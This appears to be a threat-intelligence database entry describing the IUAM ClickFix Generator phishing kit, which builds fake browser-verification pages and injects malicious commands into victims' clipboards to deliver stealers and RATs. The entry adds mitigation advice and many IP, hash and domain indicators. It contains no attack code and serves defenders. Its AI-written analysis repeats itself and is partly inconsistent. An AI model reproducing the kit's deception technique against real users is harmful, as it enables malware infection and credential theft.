The ClickFix Factory: First Exposure of IUAM ClickFix Generator
The IUAM ClickFix Generator is a phishing kit that automates the creation of phishing pages mimicking browser verification challenges to bypass automated traffic blocks. It features advanced capabilities such as operating system detection and clipboard injection, facilitating cross-platform malware deployment with minimal effort. This kit is primarily used to deploy malware including info stealers and remote access trojans (RATs). Although no known exploits in the wild have been reported yet, the kit’s sophistication and automation increase the risk of widespread phishing campaigns. European organizations are at risk due to the kit’s ability to evade detection and target multiple operating systems. Mitigation requires enhanced phishing awareness, deployment of advanced email and web filtering, and monitoring for clipboard injection behaviors. Countries with high internet usage, significant financial sectors, and large enterprise environments such as Germany, the UK, France, and the Netherlands are more likely to be targeted. Given the potential for credential theft and remote access compromise without requiring user interaction beyond clicking, the threat severity is assessed as high. Defenders should prioritize detection of phishing pages mimicking IUAM challenges and monitor for indicators of clipboard injection and malware deployment.
AI Analysis
Technical Summary
The IUAM ClickFix Generator is a newly uncovered phishing kit designed to automate the creation of phishing pages that impersonate browser verification challenges, commonly used to block automated traffic such as bots. This deception technique, known as IUAM (I'm Under Attack Mode), is exploited to trick victims into believing they must complete a verification step, thereby increasing the likelihood of interaction. The kit supports advanced features including operating system detection, allowing it to tailor payloads or phishing content based on the victim’s platform, enhancing effectiveness across Windows, macOS, and potentially other systems. Clipboard injection is another sophisticated feature that enables the malware to silently insert malicious commands or data into the victim’s clipboard, facilitating stealthy malware deployment such as info stealers (e.g., DeerStealer) and remote access trojans (RATs). These capabilities reduce the effort required by attackers to conduct cross-platform attacks and increase the chances of successful infection. The phishing pages generated are highly customizable, enabling threat actors to adapt them to various targets and scenarios. Although no active exploits have been reported in the wild, the availability of such a kit lowers the barrier for attackers to launch phishing campaigns that can bypass automated defenses. The kit’s use of techniques mapped to MITRE ATT&CK tactics such as T1036 (Masquerading), T1102 (Web Service), T1059 (Command and Scripting Interpreter), T1055 (Process Injection), and T1115 (Clipboard Data) highlights its multi-faceted approach to evasion and infection. This threat represents a significant evolution in phishing toolkits by combining social engineering with technical evasion and malware delivery features.
Potential Impact
For European organizations, the IUAM ClickFix Generator poses a substantial risk by enabling sophisticated phishing campaigns that can bypass traditional automated traffic filters and deceive users into executing malicious payloads. The potential impacts include credential theft, unauthorized remote access, data exfiltration, and broader network compromise through deployed RATs and info stealers. Financial institutions, government agencies, and enterprises with sensitive data are particularly vulnerable due to the high value of stolen credentials and access. The cross-platform nature of the kit increases the attack surface, affecting organizations using diverse operating systems including macOS, which is increasingly prevalent in European corporate environments. The clipboard injection technique can lead to stealthy malware execution that evades detection by conventional endpoint security solutions. Additionally, the kit’s automation capabilities may lead to rapid scaling of phishing campaigns, increasing the volume and reach of attacks. This can strain incident response resources and increase the likelihood of successful breaches. The absence of known exploits in the wild currently limits immediate impact, but the availability of the kit suggests a high potential for future exploitation. Overall, the threat could lead to significant operational disruption, financial loss, and reputational damage for affected organizations in Europe.
Mitigation Recommendations
European organizations should implement targeted defenses against this threat by enhancing phishing detection capabilities to recognize IUAM-style browser verification mimicry. Deploy advanced email filtering solutions that use machine learning to detect phishing content and URLs associated with the ClickFix Generator. Web gateways should be configured to block access to known phishing domains and monitor for unusual traffic patterns indicative of automated phishing campaigns. Endpoint detection and response (EDR) tools must be tuned to detect clipboard injection behaviors and suspicious process injections associated with info stealers and RATs. User awareness training should specifically include education on the risks of fake browser verification pages and the dangers of interacting with unexpected clipboard content. Network segmentation can limit lateral movement if a compromise occurs. Organizations should also monitor threat intelligence feeds for emerging indicators related to this kit and update intrusion detection/prevention systems accordingly. Incident response teams should prepare playbooks for phishing incidents involving clipboard injection and remote access malware. Finally, multi-factor authentication (MFA) should be enforced to reduce the impact of credential theft resulting from phishing.
Affected Countries
Germany, United Kingdom, France, Netherlands, Italy, Spain
Indicators of Compromise
- ip: 194.26.29.217
- ip: 45.135.232.33
- ip: 83.222.190.214
- hash: 132e25ea2d3d03895eff21604af17f45
- hash: 1fa2337e518007fa58372131884b1442
- hash: 2380171dc36e65afaf80c3f2d1b8d161
- hash: 3bae56eadb97d989914a3cf501b6a0a5
- hash: 3dce9829ad6e7520a44caee0ca4f7cfa
- hash: 3f98877f798fe4dcff570f3000683132
- hash: 52b94f794f71aed4109feda245a815aa
- hash: 5739ed3f8734497bfe782dcad9cbc6a7
- hash: 63a7cd62e4108f3c5c4b599b2bdf035b
- hash: 674d3bcfbcc296ccb583496edd06de84
- hash: 690fe7d8c8565358e952b352e056e1f9
- hash: 73b830f4ed2503039ea032ed39e99d37
- hash: 83f3f5d7e3c0bbcebbda31afef412679
- hash: 8959d414dea38bce141f054b714bf764
- hash: 8cb16b984ef26ebe769bb34fcd96f684
- hash: 959ec7c64a6d3033b05e21bd5ec01fd4
- hash: 9a1a5a3b77e20abe9d1f0c1289057195
- hash: 9c0231da175516a5939a970507908ed3
- hash: a0f4dd0e9ac7e37fe5b7e3e01f3752a1
- hash: a7ebc0b897671754075edb63a2307470
- hash: c21531258a3089cf4741db149240c6e9
- hash: c29bce01fc702d5842c0f92398030a19
- hash: e807e2bf37ff5a8b1aa7f1d239564647
- hash: f191de728c4d1b9efb29909a62626285
- hash: f1be7103516a64a70e7ddcd972ce25e3
- hash: faeb8c25710afed7688a999dcb399c6c
- hash: 06d912895b5fa0491dfd9703ffc837164873b91f
- hash: 161b56f2c934cdc3e9ec81d982f85fcc3a45d318
- hash: 1e16572806e7884c5210640accfa8427986be90e
- hash: 1e6e7584702532d7b0cd90833cf112b9c390ea81
- hash: 3518cc2c60234d3aedf4783277e4d10967cf9384
- hash: 3a23c229edcc590662ffcafecefa6c02cd1039e1
- hash: 41249d171c29bc4451fecc3bc1b4037c51ae9fbd
- hash: 4187aa07c679f821f8eedca75504ead6a8aff34e
- hash: 434d67b9bc05446dc997b4c13a5da8455f7d6fbe
- hash: 43917e7dab6e09087de24f7878b9c1c1a7ec1968
- hash: 5cb52d890830db0774f4bc1b560742abaccea862
- hash: 5df0b345a902d2fc4a5777d886db6b7eec78b24e
- hash: 5f0bbc9195d2964dd610509ed093e7d90612827f
- hash: 6351347e2973e495e722c165dc0ae5af8f6afe7d
- hash: 9d6164091ec10df644c1a0805e2a64e4cf6d2a45
- hash: b549c5960c723e4724e7942fc8c95c2ec68805b4
- hash: b61dd1b3e4e2ec13d4281fa981454c975590089d
- hash: bbd6fca3fed94c67f9b7df5b2ee91e1f5390c3c4
- hash: c0a03823306cebe90976c276dea408e78e895648
- hash: c5594884ff7681770fef987851d99a57e0f0c485
- hash: c892e29d9be9ef00d1374e131437e6ce9861a794
- hash: d79dbe3c99396e5e857cb37ad38120f7cabfd340
- hash: de944869a7508f2e4f22c9217a0ea9fb928c5619
- hash: e9797b3d90d6f544663b46d9348bd18a4ac8e944
- hash: f7e57470beb8678d881eb5426d02da77d5a03bd4
- hash: f96575112f94a6563600cd86256a5afb0ddbbca7
- hash: 00c953a678c1aa115dbe344af18c2704e23b11e6c6968c46127dd3433ea73bf2
- hash: 029a5405bbb6e065c8422ecc0dea42bb2689781d03ef524d9374365ebb0542f9
- hash: 039f82e92c592f8c39b9314eac1b2d4475209a240a7ad052b730f9ba0849a54a
- hash: 081921671d15071723cfe979633a759a36d1d15411f0a6172719b521458a987d
- hash: 2b74674587a65cfc9c2c47865ca8128b4f7e47142bd4f53ed6f3cb5cf37f7a6b
- hash: 397ee604eb5e20905605c9418838aadccbbbfe6a15fc9146442333cfc1516273
- hash: 3aee8ad1a30d09d7e40748fa36cd9f9429e698c28e2a1c3bcf88a062155eee8c
- hash: 6e4119fe4c8cf837dac27e2948ce74dc7af3b9d4e1e4b28d22c4cf039e18b993
- hash: 72633ddb45bfff1abeba3fc215077ba010ae233f8d0ceff88f7ac29c1c594ada
- hash: 7765e5e0a7622ff69bd2cee0a75f2aae05643179b4dd333d0e75f98a42894065
- hash: 7881a60ee0ad02130f447822d89e09352b084f596ec43ead78b51e331175450f
- hash: 7a8250904e6f079e1a952b87e55dc87e467cc560a2694a142f2d6547ac40d5e1
- hash: 816bf9ef902251e7de73d57c4bf19a4de00311414a3e317472074ef05ab3d565
- hash: 82b73222629ce27531f57bae6800831a169dff71849e1d7e790d9bd9eb6e9ee7
- hash: 8ed8880f40a114f58425e0a806b7d35d96aa18b2be83dede63eff0644fd7937d
- hash: 9090385242509a344efd734710e60a8f73719130176c726e58d32687b22067c8
- hash: 966108cf5f3e503672d90bca3df609f603bb023f1c51c14d06cc99d2ce40790c
- hash: 9c5920fa25239c0f116ce7818949ddce5fd2f31531786371541ccb4886c5aeb2
- hash: ba5305e944d84874bde603bf38008675503244dc09071d19c8c22ded9d4f6db4
- hash: cd78a77d40682311fd30d74462fb3e614cbc4ea79c3c0894ba856a01557fd7c0
- hash: d110059f5534360e58ff5f420851eb527c556badb8e5db87ddf52a42c1f1fe76
- hash: d375bb10adfd1057469682887ed0bc24b7414b7cec361031e0f8016049a143f9
- hash: d81cc9380673cb36a30f2a84ef155b0cbc7958daa6870096e455044fba5f9ee8
- hash: ead6b1f0add059261ac56e9453131184bc0ae2869f983b6a41a1abb167edf151
- hash: f2a068164ed7b173f17abe52ad95c53bccf3bb9966d75027d1e8960f7e0d43ac
- hash: fe8b1b5b0ca9e7a95b33d3fcced833c1852c5a16662f71ddea41a97181532b14
- ip: 185.93.89.62
- ip: 188.92.28.186
- ip: 38.242.212.5
- ip: 45.146.130.129
- ip: 45.146.130.131
- ip: 45.146.130.132
- ip: 88.214.50.3
- domain: 365-drive.com
- domain: apposx.com
- domain: asmicareer.com
- domain: claudflurer.com
- domain: cloudlare-lndex.com
- domain: coffeyelectric.com
- domain: emailreddit.com
- domain: evodigital.com.au
- domain: favorite-hotels.com
- domain: financementure.com
- domain: fudgeshop.com.au
- domain: ibs-express.com
- domain: quirkyrealty.com
- domain: speedtestcheck.org
- domain: teamsonsoft.com
- domain: techinnovhub.co.za
- domain: tradingviewen.com
- domain: ttxttx.com
- domain: watchlist-verizon.com
- domain: crm.jskymedia.com
- domain: sifld.rajeshmhegde.com
- domain: treadingveew.dekstop-apps.com
- domain: treadingveew.last-desk.org
The ClickFix Factory: First Exposure of IUAM ClickFix Generator
Description
The IUAM ClickFix Generator is a phishing kit that automates the creation of phishing pages mimicking browser verification challenges to bypass automated traffic blocks. It features advanced capabilities such as operating system detection and clipboard injection, facilitating cross-platform malware deployment with minimal effort. This kit is primarily used to deploy malware including info stealers and remote access trojans (RATs). Although no known exploits in the wild have been reported yet, the kit’s sophistication and automation increase the risk of widespread phishing campaigns. European organizations are at risk due to the kit’s ability to evade detection and target multiple operating systems. Mitigation requires enhanced phishing awareness, deployment of advanced email and web filtering, and monitoring for clipboard injection behaviors. Countries with high internet usage, significant financial sectors, and large enterprise environments such as Germany, the UK, France, and the Netherlands are more likely to be targeted. Given the potential for credential theft and remote access compromise without requiring user interaction beyond clicking, the threat severity is assessed as high. Defenders should prioritize detection of phishing pages mimicking IUAM challenges and monitor for indicators of clipboard injection and malware deployment.
AI-Powered Analysis
Technical Analysis
The IUAM ClickFix Generator is a newly uncovered phishing kit designed to automate the creation of phishing pages that impersonate browser verification challenges, commonly used to block automated traffic such as bots. This deception technique, known as IUAM (I'm Under Attack Mode), is exploited to trick victims into believing they must complete a verification step, thereby increasing the likelihood of interaction. The kit supports advanced features including operating system detection, allowing it to tailor payloads or phishing content based on the victim’s platform, enhancing effectiveness across Windows, macOS, and potentially other systems. Clipboard injection is another sophisticated feature that enables the malware to silently insert malicious commands or data into the victim’s clipboard, facilitating stealthy malware deployment such as info stealers (e.g., DeerStealer) and remote access trojans (RATs). These capabilities reduce the effort required by attackers to conduct cross-platform attacks and increase the chances of successful infection. The phishing pages generated are highly customizable, enabling threat actors to adapt them to various targets and scenarios. Although no active exploits have been reported in the wild, the availability of such a kit lowers the barrier for attackers to launch phishing campaigns that can bypass automated defenses. The kit’s use of techniques mapped to MITRE ATT&CK tactics such as T1036 (Masquerading), T1102 (Web Service), T1059 (Command and Scripting Interpreter), T1055 (Process Injection), and T1115 (Clipboard Data) highlights its multi-faceted approach to evasion and infection. This threat represents a significant evolution in phishing toolkits by combining social engineering with technical evasion and malware delivery features.
Potential Impact
For European organizations, the IUAM ClickFix Generator poses a substantial risk by enabling sophisticated phishing campaigns that can bypass traditional automated traffic filters and deceive users into executing malicious payloads. The potential impacts include credential theft, unauthorized remote access, data exfiltration, and broader network compromise through deployed RATs and info stealers. Financial institutions, government agencies, and enterprises with sensitive data are particularly vulnerable due to the high value of stolen credentials and access. The cross-platform nature of the kit increases the attack surface, affecting organizations using diverse operating systems including macOS, which is increasingly prevalent in European corporate environments. The clipboard injection technique can lead to stealthy malware execution that evades detection by conventional endpoint security solutions. Additionally, the kit’s automation capabilities may lead to rapid scaling of phishing campaigns, increasing the volume and reach of attacks. This can strain incident response resources and increase the likelihood of successful breaches. The absence of known exploits in the wild currently limits immediate impact, but the availability of the kit suggests a high potential for future exploitation. Overall, the threat could lead to significant operational disruption, financial loss, and reputational damage for affected organizations in Europe.
Mitigation Recommendations
European organizations should implement targeted defenses against this threat by enhancing phishing detection capabilities to recognize IUAM-style browser verification mimicry. Deploy advanced email filtering solutions that use machine learning to detect phishing content and URLs associated with the ClickFix Generator. Web gateways should be configured to block access to known phishing domains and monitor for unusual traffic patterns indicative of automated phishing campaigns. Endpoint detection and response (EDR) tools must be tuned to detect clipboard injection behaviors and suspicious process injections associated with info stealers and RATs. User awareness training should specifically include education on the risks of fake browser verification pages and the dangers of interacting with unexpected clipboard content. Network segmentation can limit lateral movement if a compromise occurs. Organizations should also monitor threat intelligence feeds for emerging indicators related to this kit and update intrusion detection/prevention systems accordingly. Incident response teams should prepare playbooks for phishing incidents involving clipboard injection and remote access malware. Finally, multi-factor authentication (MFA) should be enforced to reduce the impact of credential theft resulting from phishing.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://unit42.paloaltonetworks.com/clickfix-generator-first-of-its-kind/"]
- Adversary
- null
- Pulse Id
- 68e94967bcab143b278f0611
- Threat Score
- null
Indicators of Compromise
Ip
| Value | Description | Copy |
|---|---|---|
ip194.26.29.217 | CC=RU ASN=AS206728 media land llc | |
ip45.135.232.33 | CC=RU ASN=AS50340 ooo network of data-centers selectel | |
ip83.222.190.214 | CC=BG ASN=AS8866 bulgarian telecommunications company plc. | |
ip185.93.89.62 | CC=GB ASN=ASNone | |
ip188.92.28.186 | CC=IT ASN=ASNone | |
ip38.242.212.5 | CC=US ASN=AS51167 contabo gmbh | |
ip45.146.130.129 | CC=AT ASN=AS60781 leaseweb netherlands b.v. | |
ip45.146.130.131 | CC=AT ASN=AS60781 leaseweb netherlands b.v. | |
ip45.146.130.132 | CC=AT ASN=AS60781 leaseweb netherlands b.v. | |
ip88.214.50.3 | CC=US ASN=AS207710 sia singularity telecom |
Hash
| Value | Description | Copy |
|---|---|---|
hash132e25ea2d3d03895eff21604af17f45 | MD5 of cd78a77d40682311fd30d74462fb3e614cbc4ea79c3c0894ba856a01557fd7c0 | |
hash1fa2337e518007fa58372131884b1442 | MD5 of 7765e5e0a7622ff69bd2cee0a75f2aae05643179b4dd333d0e75f98a42894065 | |
hash2380171dc36e65afaf80c3f2d1b8d161 | MD5 of d81cc9380673cb36a30f2a84ef155b0cbc7958daa6870096e455044fba5f9ee8 | |
hash3bae56eadb97d989914a3cf501b6a0a5 | MD5 of 029a5405bbb6e065c8422ecc0dea42bb2689781d03ef524d9374365ebb0542f9 | |
hash3dce9829ad6e7520a44caee0ca4f7cfa | MD5 of 397ee604eb5e20905605c9418838aadccbbbfe6a15fc9146442333cfc1516273 | |
hash3f98877f798fe4dcff570f3000683132 | MD5 of 9090385242509a344efd734710e60a8f73719130176c726e58d32687b22067c8 | |
hash52b94f794f71aed4109feda245a815aa | MD5 of 081921671d15071723cfe979633a759a36d1d15411f0a6172719b521458a987d | |
hash5739ed3f8734497bfe782dcad9cbc6a7 | MD5 of 3aee8ad1a30d09d7e40748fa36cd9f9429e698c28e2a1c3bcf88a062155eee8c | |
hash63a7cd62e4108f3c5c4b599b2bdf035b | MD5 of 8ed8880f40a114f58425e0a806b7d35d96aa18b2be83dede63eff0644fd7937d | |
hash674d3bcfbcc296ccb583496edd06de84 | MD5 of ba5305e944d84874bde603bf38008675503244dc09071d19c8c22ded9d4f6db4 | |
hash690fe7d8c8565358e952b352e056e1f9 | MD5 of 2b74674587a65cfc9c2c47865ca8128b4f7e47142bd4f53ed6f3cb5cf37f7a6b | |
hash73b830f4ed2503039ea032ed39e99d37 | MD5 of 816bf9ef902251e7de73d57c4bf19a4de00311414a3e317472074ef05ab3d565 | |
hash83f3f5d7e3c0bbcebbda31afef412679 | MD5 of 7881a60ee0ad02130f447822d89e09352b084f596ec43ead78b51e331175450f | |
hash8959d414dea38bce141f054b714bf764 | MD5 of f2a068164ed7b173f17abe52ad95c53bccf3bb9966d75027d1e8960f7e0d43ac | |
hash8cb16b984ef26ebe769bb34fcd96f684 | MD5 of 9c5920fa25239c0f116ce7818949ddce5fd2f31531786371541ccb4886c5aeb2 | |
hash959ec7c64a6d3033b05e21bd5ec01fd4 | MD5 of 966108cf5f3e503672d90bca3df609f603bb023f1c51c14d06cc99d2ce40790c | |
hash9a1a5a3b77e20abe9d1f0c1289057195 | MD5 of fe8b1b5b0ca9e7a95b33d3fcced833c1852c5a16662f71ddea41a97181532b14 | |
hash9c0231da175516a5939a970507908ed3 | MD5 of d375bb10adfd1057469682887ed0bc24b7414b7cec361031e0f8016049a143f9 | |
hasha0f4dd0e9ac7e37fe5b7e3e01f3752a1 | MD5 of ead6b1f0add059261ac56e9453131184bc0ae2869f983b6a41a1abb167edf151 | |
hasha7ebc0b897671754075edb63a2307470 | MD5 of 82b73222629ce27531f57bae6800831a169dff71849e1d7e790d9bd9eb6e9ee7 | |
hashc21531258a3089cf4741db149240c6e9 | MD5 of 039f82e92c592f8c39b9314eac1b2d4475209a240a7ad052b730f9ba0849a54a | |
hashc29bce01fc702d5842c0f92398030a19 | MD5 of 00c953a678c1aa115dbe344af18c2704e23b11e6c6968c46127dd3433ea73bf2 | |
hashe807e2bf37ff5a8b1aa7f1d239564647 | MD5 of 72633ddb45bfff1abeba3fc215077ba010ae233f8d0ceff88f7ac29c1c594ada | |
hashf191de728c4d1b9efb29909a62626285 | MD5 of d110059f5534360e58ff5f420851eb527c556badb8e5db87ddf52a42c1f1fe76 | |
hashf1be7103516a64a70e7ddcd972ce25e3 | MD5 of 6e4119fe4c8cf837dac27e2948ce74dc7af3b9d4e1e4b28d22c4cf039e18b993 | |
hashfaeb8c25710afed7688a999dcb399c6c | MD5 of 7a8250904e6f079e1a952b87e55dc87e467cc560a2694a142f2d6547ac40d5e1 | |
hash06d912895b5fa0491dfd9703ffc837164873b91f | SHA1 of 816bf9ef902251e7de73d57c4bf19a4de00311414a3e317472074ef05ab3d565 | |
hash161b56f2c934cdc3e9ec81d982f85fcc3a45d318 | SHA1 of 7881a60ee0ad02130f447822d89e09352b084f596ec43ead78b51e331175450f | |
hash1e16572806e7884c5210640accfa8427986be90e | SHA1 of 9c5920fa25239c0f116ce7818949ddce5fd2f31531786371541ccb4886c5aeb2 | |
hash1e6e7584702532d7b0cd90833cf112b9c390ea81 | SHA1 of 2b74674587a65cfc9c2c47865ca8128b4f7e47142bd4f53ed6f3cb5cf37f7a6b | |
hash3518cc2c60234d3aedf4783277e4d10967cf9384 | SHA1 of 081921671d15071723cfe979633a759a36d1d15411f0a6172719b521458a987d | |
hash3a23c229edcc590662ffcafecefa6c02cd1039e1 | SHA1 of fe8b1b5b0ca9e7a95b33d3fcced833c1852c5a16662f71ddea41a97181532b14 | |
hash41249d171c29bc4451fecc3bc1b4037c51ae9fbd | SHA1 of 72633ddb45bfff1abeba3fc215077ba010ae233f8d0ceff88f7ac29c1c594ada | |
hash4187aa07c679f821f8eedca75504ead6a8aff34e | SHA1 of 00c953a678c1aa115dbe344af18c2704e23b11e6c6968c46127dd3433ea73bf2 | |
hash434d67b9bc05446dc997b4c13a5da8455f7d6fbe | SHA1 of 966108cf5f3e503672d90bca3df609f603bb023f1c51c14d06cc99d2ce40790c | |
hash43917e7dab6e09087de24f7878b9c1c1a7ec1968 | SHA1 of d110059f5534360e58ff5f420851eb527c556badb8e5db87ddf52a42c1f1fe76 | |
hash5cb52d890830db0774f4bc1b560742abaccea862 | SHA1 of f2a068164ed7b173f17abe52ad95c53bccf3bb9966d75027d1e8960f7e0d43ac | |
hash5df0b345a902d2fc4a5777d886db6b7eec78b24e | SHA1 of 3aee8ad1a30d09d7e40748fa36cd9f9429e698c28e2a1c3bcf88a062155eee8c | |
hash5f0bbc9195d2964dd610509ed093e7d90612827f | SHA1 of 397ee604eb5e20905605c9418838aadccbbbfe6a15fc9146442333cfc1516273 | |
hash6351347e2973e495e722c165dc0ae5af8f6afe7d | SHA1 of 029a5405bbb6e065c8422ecc0dea42bb2689781d03ef524d9374365ebb0542f9 | |
hash9d6164091ec10df644c1a0805e2a64e4cf6d2a45 | SHA1 of 6e4119fe4c8cf837dac27e2948ce74dc7af3b9d4e1e4b28d22c4cf039e18b993 | |
hashb549c5960c723e4724e7942fc8c95c2ec68805b4 | SHA1 of cd78a77d40682311fd30d74462fb3e614cbc4ea79c3c0894ba856a01557fd7c0 | |
hashb61dd1b3e4e2ec13d4281fa981454c975590089d | SHA1 of 7765e5e0a7622ff69bd2cee0a75f2aae05643179b4dd333d0e75f98a42894065 | |
hashbbd6fca3fed94c67f9b7df5b2ee91e1f5390c3c4 | SHA1 of 82b73222629ce27531f57bae6800831a169dff71849e1d7e790d9bd9eb6e9ee7 | |
hashc0a03823306cebe90976c276dea408e78e895648 | SHA1 of d81cc9380673cb36a30f2a84ef155b0cbc7958daa6870096e455044fba5f9ee8 | |
hashc5594884ff7681770fef987851d99a57e0f0c485 | SHA1 of 039f82e92c592f8c39b9314eac1b2d4475209a240a7ad052b730f9ba0849a54a | |
hashc892e29d9be9ef00d1374e131437e6ce9861a794 | SHA1 of ead6b1f0add059261ac56e9453131184bc0ae2869f983b6a41a1abb167edf151 | |
hashd79dbe3c99396e5e857cb37ad38120f7cabfd340 | SHA1 of 8ed8880f40a114f58425e0a806b7d35d96aa18b2be83dede63eff0644fd7937d | |
hashde944869a7508f2e4f22c9217a0ea9fb928c5619 | SHA1 of ba5305e944d84874bde603bf38008675503244dc09071d19c8c22ded9d4f6db4 | |
hashe9797b3d90d6f544663b46d9348bd18a4ac8e944 | SHA1 of 9090385242509a344efd734710e60a8f73719130176c726e58d32687b22067c8 | |
hashf7e57470beb8678d881eb5426d02da77d5a03bd4 | SHA1 of 7a8250904e6f079e1a952b87e55dc87e467cc560a2694a142f2d6547ac40d5e1 | |
hashf96575112f94a6563600cd86256a5afb0ddbbca7 | SHA1 of d375bb10adfd1057469682887ed0bc24b7414b7cec361031e0f8016049a143f9 | |
hash00c953a678c1aa115dbe344af18c2704e23b11e6c6968c46127dd3433ea73bf2 | — | |
hash029a5405bbb6e065c8422ecc0dea42bb2689781d03ef524d9374365ebb0542f9 | — | |
hash039f82e92c592f8c39b9314eac1b2d4475209a240a7ad052b730f9ba0849a54a | — | |
hash081921671d15071723cfe979633a759a36d1d15411f0a6172719b521458a987d | — | |
hash2b74674587a65cfc9c2c47865ca8128b4f7e47142bd4f53ed6f3cb5cf37f7a6b | — | |
hash397ee604eb5e20905605c9418838aadccbbbfe6a15fc9146442333cfc1516273 | — | |
hash3aee8ad1a30d09d7e40748fa36cd9f9429e698c28e2a1c3bcf88a062155eee8c | — | |
hash6e4119fe4c8cf837dac27e2948ce74dc7af3b9d4e1e4b28d22c4cf039e18b993 | — | |
hash72633ddb45bfff1abeba3fc215077ba010ae233f8d0ceff88f7ac29c1c594ada | — | |
hash7765e5e0a7622ff69bd2cee0a75f2aae05643179b4dd333d0e75f98a42894065 | — | |
hash7881a60ee0ad02130f447822d89e09352b084f596ec43ead78b51e331175450f | — | |
hash7a8250904e6f079e1a952b87e55dc87e467cc560a2694a142f2d6547ac40d5e1 | — | |
hash816bf9ef902251e7de73d57c4bf19a4de00311414a3e317472074ef05ab3d565 | — | |
hash82b73222629ce27531f57bae6800831a169dff71849e1d7e790d9bd9eb6e9ee7 | — | |
hash8ed8880f40a114f58425e0a806b7d35d96aa18b2be83dede63eff0644fd7937d | — | |
hash9090385242509a344efd734710e60a8f73719130176c726e58d32687b22067c8 | — | |
hash966108cf5f3e503672d90bca3df609f603bb023f1c51c14d06cc99d2ce40790c | — | |
hash9c5920fa25239c0f116ce7818949ddce5fd2f31531786371541ccb4886c5aeb2 | — | |
hashba5305e944d84874bde603bf38008675503244dc09071d19c8c22ded9d4f6db4 | — | |
hashcd78a77d40682311fd30d74462fb3e614cbc4ea79c3c0894ba856a01557fd7c0 | — | |
hashd110059f5534360e58ff5f420851eb527c556badb8e5db87ddf52a42c1f1fe76 | — | |
hashd375bb10adfd1057469682887ed0bc24b7414b7cec361031e0f8016049a143f9 | — | |
hashd81cc9380673cb36a30f2a84ef155b0cbc7958daa6870096e455044fba5f9ee8 | — | |
hashead6b1f0add059261ac56e9453131184bc0ae2869f983b6a41a1abb167edf151 | — | |
hashf2a068164ed7b173f17abe52ad95c53bccf3bb9966d75027d1e8960f7e0d43ac | — | |
hashfe8b1b5b0ca9e7a95b33d3fcced833c1852c5a16662f71ddea41a97181532b14 | — |
Domain
| Value | Description | Copy |
|---|---|---|
domain365-drive.com | — | |
domainapposx.com | — | |
domainasmicareer.com | — | |
domainclaudflurer.com | — | |
domaincloudlare-lndex.com | — | |
domaincoffeyelectric.com | — | |
domainemailreddit.com | — | |
domainevodigital.com.au | — | |
domainfavorite-hotels.com | — | |
domainfinancementure.com | — | |
domainfudgeshop.com.au | — | |
domainibs-express.com | — | |
domainquirkyrealty.com | — | |
domainspeedtestcheck.org | — | |
domainteamsonsoft.com | — | |
domaintechinnovhub.co.za | — | |
domaintradingviewen.com | — | |
domainttxttx.com | — | |
domainwatchlist-verizon.com | — | |
domaincrm.jskymedia.com | — | |
domainsifld.rajeshmhegde.com | — | |
domaintreadingveew.dekstop-apps.com | — | |
domaintreadingveew.last-desk.org | — |
Threat ID: 68e94bbba811ebd3155d19b1
Added to database: 10/10/2025, 6:08:59 PM
Last enriched: 10/10/2025, 6:24:57 PM
Last updated: 10/11/2025, 2:23:12 AM
Views: 6
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Stealit Malware Abuses Node.js Single Executable Feature via Game and VPN Installers
MediumThreatFox IOCs for 2025-10-10
MediumFrom infostealer to full RAT: dissecting the PureRAT attack chain
MediumBlog Anatomy of a Hacktivist Attack: Russian-Aligned Group Targets OT/ICS
MediumStealit Malware Using Node.js to Hide in Fake Game and VPN Installers
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.